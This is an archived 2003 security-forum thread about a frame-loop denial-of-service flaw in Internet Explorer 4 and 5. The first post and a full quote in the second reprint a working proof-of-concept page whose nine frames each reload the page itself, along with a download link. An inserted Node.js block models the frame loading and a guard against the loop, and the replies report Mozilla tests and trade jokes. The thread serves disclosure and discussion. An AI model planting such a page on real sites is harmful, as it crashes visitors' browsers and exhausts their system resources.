Computer Security - Yet Another IE Vulnerability??- Frame Looping

 
Old 11-12-2003, 06:10 AM   #1
Default Yet Another IE Vulnerability??- Frame Looping



Microsoft Internet Explorer 4.x 5.x - Frame Loop Vulnerability


Microsoft Internet Explorer 4.x

Microsoft Internet Explorer 5.x
Frame Loop Vulnerability




PROBLEM:

It is possible to create a malicious webpage that when visited by an IE
user all of their system resources are devoured and depending on the
system it's possible that the machine can even crash and reboot itself.

The reason you can use up all of the client's resources is by creating
an endless loop of frames.

You create an HTML file that has a few frames inside it and then link
those frames back to the same html file so every time IE loads the new
frame it loads another new frame and another etc...

Until after a short time your resources are all used up and your system
crashes.

We understand this is somewhat of a nuisance hole but still something
that needs to be addressed.

Example:

-----------readme.htm------------
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<head>
<title>Ussrlabs is getting hard</title>
</head>
<frameset framespacing="2" frameborder="no" rows="65,*">
<frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
<frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
<frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
<frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
<frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
<frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
<frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
<frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
<frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
<noframes>
<body bgcolor="#FFFFFF">
<p>This web page uses frames, but your browser doesn't support them.</p>
</body>
</noframes>
</frameset>
<frameset>
<noframes>
</noframes>
</frameset>
</html>
-----------readme.htm------------

Or, if you want, the HTML can be downloaded here.

http://www.ussrback.com/iehole/readme.zip

Note: It also affects Microsoft FrontPage.

Vendor Status:

Contacted.

"We talked to MS and they said this is a nuisance attack and do not
think it's a security hole. So you will not be getting a patch for
this (maybe). However, it is good to know that Netscape Navigator is not
affected by this hole."

Vendor Url: http://www.microsoft.com/

Program Url: http://www.microsoft.com/windows/ie/default.htm

Credit:

USSRLABS

SOLUTION:

Nothing yet.




I made one of those pages (frame-loop-tester.html), placed it in my
webserver's /pub directory, and tested it against Mozilla (because I'm
not crazy enough to run IE) on my Linux box. It did try sucking up
system resources, and with top running in an x-term, the process tried
to use up about 92%, at which time Linux cut it. Nothing appeared on the
browser.



--
-=-=-=-=-=-=-=-=-=Atr2-WBS @ Atr2.Ath.Cx=-=-=-=-=-=-=-=-=-
[jayjwa] Mod_SSL / GPG / OpenSSL
"Save the 'Net, Unplug a Windows machine today!"

=-=-=Linux Tough.Powered By Slackware=-=HTTPS/FTP=-RLF#37=





jayjwa
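
The growth described in the advisory above, and the kind of guard that makes a loader stop instead of exhausting memory, as an added example that is not part of the original posts: a small Node.js model of a frame loader that goes beyond the single self-referencing page to any frame tree. The URLs, `SAMPLE_PAGES`, `frameTargets` and `loadFrames` are constructed for illustration and do not describe how any particular browser implements its check.

```javascript
// Added example: models a frame loader to compare an unguarded walk with an ancestor-URL check.
// SAMPLE_PAGES is constructed sample input; frameTargets/loadFrames are hypothetical names.
const SAMPLE_PAGES = {
  "http://test.invalid/readme.htm":
    '<frameset rows="65,*">' + '<frame src="readme.htm" name="top">'.repeat(9) + "</frameset>",
  "http://test.invalid/index.htm":
    '<frameset cols="20%,*"><frame src="menu.htm"><frame src="body.htm"></frameset>',
  "http://test.invalid/menu.htm": "<html><body>menu</body></html>",
  "http://test.invalid/body.htm": "<html><body>body</body></html>",
};

// Pull frame/iframe src attributes and resolve them against the document URL.
function frameTargets(html, baseUrl) {
  const targets = [];
  const re = /<i?frame\b[^>]*?\bsrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi;
  for (const m of html.matchAll(re)) {
    const url = new URL(m[1] ?? m[2] ?? m[3], baseUrl);
    url.hash = ""; // fragments do not change which document is loaded
    targets.push(url.href);
  }
  return targets;
}

// Walk the frame tree. Returns counts of documents loaded and frames refused.
function loadFrames(pages, startUrl, { ancestorCheck, maxDepth, budget = 100000 }) {
  const stats = { loaded: 0, refused: 0, budgetHit: false };
  const visit = (url, ancestors) => {
    if (stats.loaded >= budget) { stats.budgetHit = true; return; }
    stats.loaded += 1;
    if (ancestors.length >= maxDepth) return; // nesting cap: do not descend further
    for (const child of frameTargets(pages[url] ?? "", url)) {
      if (ancestorCheck && (child === url || ancestors.includes(child))) {
        stats.refused += 1; // frame would load a document already in its ancestor chain
        continue;
      }
      visit(child, [...ancestors, url]);
    }
  };
  visit(startUrl, []);
  return stats;
}
```

With the nine-frame sample and a nesting cap of 4, the unguarded walk loads 7381 documents (1 + 9 + 81 + 729 + 6561), while the ancestor check loads one document and refuses nine frames.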
Old 11-12-2003, 07:38 AM   #2
Colonel Flagg
 
Posts: n/a
Default Re: Yet Another IE Vulnerability??- Frame Looping
In article <>,
says...
>
> Microsoft Internet Explorer 4.x 5.x - Frame Loop Vulnerability
>
>
> Microsoft Internet Explorer 4.x
>
> Microsoft Internet Explorer 5.x
> Frame Loop Vulnerability
>
>
>
>
> PROBLEM:
>
> It is possible to create a malicious webpage that when visited by an IE
> user all of their system resources are devoured and depending on the
> system it's possible that the machine can even crash and reboot itself.
>
> The reason you can use up all of the client's resources is by creating
> an endless loop of frames.
>
> You create an HTML file that has a few frames inside it and then link
> those frames back to the same html file so every time IE loads the new
> frame it loads another new frame and another etc...
>
> Until after a short time your resources are all used up and your system
> crashes.
>
> We understand this is somewhat of a nuisance hole but still something
> that needs to be addressed.
>
> Example:
>
> -----------readme.htm------------
> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
> <html>
> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
> <head>
> <title>Ussrlabs is getting hard</title>
> </head>
> <frameset framespacing="2" frameborder="no" rows="65,*">
> <frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
> <frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
> <frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
> <frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
> <frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
> <frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
> <frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
> <frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
> <frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
> <noframes>
> <body bgcolor="#FFFFFF">
> <p>This web page uses frames, but your browser doesn't support them.</p>
> </body>
> </noframes>
> </frameset>
> <frameset>
> <noframes>
> </noframes>
> </frameset>
> </html>
> -----------readme.htm------------
>
> Or, if you want, the HTML can be downloaded here.
>
> http://www.ussrback.com/iehole/readme.zip
>
> Note: It also affects Microsoft FrontPage.
>
> Vendor Status:
>
> Contacted.
>
> "We talked to MS and they said this is a nuisance attack and do not
> think it's a security hole. So you will not be getting a patch for
> this (maybe). However, it is good to know that Netscape Navigator is not
> affected by this hole."
>
> Vendor Url: http://www.microsoft.com/
>
> Program Url: http://www.microsoft.com/windows/ie/default.htm
>
> Credit:
>
> USSRLABS
>
> SOLUTION:
>
> Nothing yet.
>
>
>
>
> I made one of those pages (frame-loop-tester.html), placed it in my
> webserver's /pub directory, and tested it against Mozilla (because I'm
> not crazy enough to run IE) on my Linux box. It did try sucking up
> system resources, and with top running in an x-term, the process tried
> to use up about 92%, at which time Linux cut it. Nothing appeared on the
> browser.
>
>
>
>




thanks for another example of why IE should be ripped out of Windows and
replaced with something a little less dangerous, like Lynx

go ahead folks, keep running your Fat32 and NTFS as Admin... you're
doing nothing but propagating Microsoft's demise.




--
Colonel Flagg
http://www.internetwarzone.org/

Privacy at a click:
http://www.cotse.net

Q: How many Bill Gates does it take to change a lightbulb?
A: None, he just defines Darkness? as the new industry standard..."

"...I see stupid people."


Colonel Flagg
Old 11-12-2003, 08:02 AM   #3
Thund3rstruck
 
Posts: n/a
Default Re: Yet Another IE Vulnerability??- Frame Looping
Colonel Flagg Spilled my beer when they jumped on the table and
proclaimed in <>:
> thanks for another example of why IE should be ripped out of Windows
> and replaced with something a little less dangerous, like Lynx
>
> go ahead folks, keep running your Fat32 and NTFS as Admin... you're
> doing nothing but propagating Microsoft's demise.


Running as Admin is the same as running in root. "If you play in
root you will eventually kill the whole tree" - forget his name but
he's in the c.o.l.s newsgroup... <G>

NOI


Thund3rstruck
Old 11-12-2003, 03:26 PM   #4
n1pop@hotmail.com
 
Posts: n/a
Default Re: Yet Another IE Vulnerability??- Frame Looping
jayjwa <> wrote in message news:<>...
> I made one of those pages (frame-loop-tester.html), placed it in my
> webserver's /pub directory, and tested it against Mozilla (because I'm
> not crazy enough to run IE) on my Linux box. It did try sucking up
> system resources, and with top running in an x-term, the process tried
> to use up about 92%, at which time Linux cut it. Nothing appeared on the
> browser.


As a local file, Mozilla on XP Pro (work) loaded the page but stopped.
Didn't lock, didn't die, just finished at some point.


n1pop@hotmail.com
Old 11-12-2003, 08:11 PM   #5
Beavis
 
Posts: n/a
Default Re: Yet Another IE Vulnerability??- Frame Looping
> PROBLEM:
>
> It is possible to create a malicious webpage that when visited by an IE
> user all of their system resources are devoured and depending on the
> system it's possible that the machine can even crash and reboot itself.
>

Isn't this IE's default behavior?


Beavis
Old 11-13-2003, 10:41 AM   #6
@micro$oft.com
 
Posts: n/a
Default Re: Yet Another IE Vulnerability??- Frame Looping
Beavis wrote:
>>PROBLEM:
>>
>>It is possible to create a malicious webpage that when visited by an IE
>>user all of their system resources are devoured and depending on the
>>system it's possible that the machine can even crash and reboot itself.
>>

>
> Isn't this IE's default behavior?


I see lots of Mozilla's but no one tried it on IE yet?


-jayjwa





@micro$oft.com